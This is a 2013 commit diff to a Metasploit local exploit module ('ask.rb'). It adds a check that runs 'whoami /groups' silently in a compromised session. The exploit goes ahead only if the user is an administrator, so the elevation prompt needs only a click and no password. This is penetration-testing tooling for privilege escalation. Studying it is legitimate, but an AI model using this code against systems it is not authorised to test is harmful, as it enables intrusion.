Added check method

The method checks to see if the user is a part of the admin group. If the user is the exploit continues, if not the exploit stops because it will prompt the user for a password instead of just clicking ok.
2013-10-21 11:57:50 -07:00 · 2013-10-21 11:57:50 -07:00 · 9695b2d662
parent 6881774c03
commit 9695b2d662
1 changed files with 29 additions and 0 deletions
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@ -48,7 +48,36 @@ class Metasploit3 < Msf::Exploit::Local

  end

+  def check
+    session.readline
+    print_status('Checking admin status...')
+    whoami = session.sys.process.execute('cmd /c whoami /groups',
+                                         nil,
+                                         {'Hidden' => true, 'Channelized' => true}
+    )
+    cmdout = []
+    while(cmdoutput = whoami.channel.read)
+      cmdout << cmdoutput
+    end
+    if cmdout.size == 0
+      fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute")
+    else
+      isinadmins = cmdout.join.scan(/S-1-5-32-544/)
+      if isinadmins.size > 0
+        print_good('Part of Administrators group! Continuing...')
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_error('Not in admins group, cannot escalate with this module')
+        print_error('Exiting...')
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
  def exploit
+    admin_check = check
+    if admin_check.join =~ /safe/
+      return Exploit::CheckCode::Safe
+    end
    root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
    open_key = session.sys.registry.open_key(root_key, base_key)
    lua_setting = open_key.query_value('EnableLUA')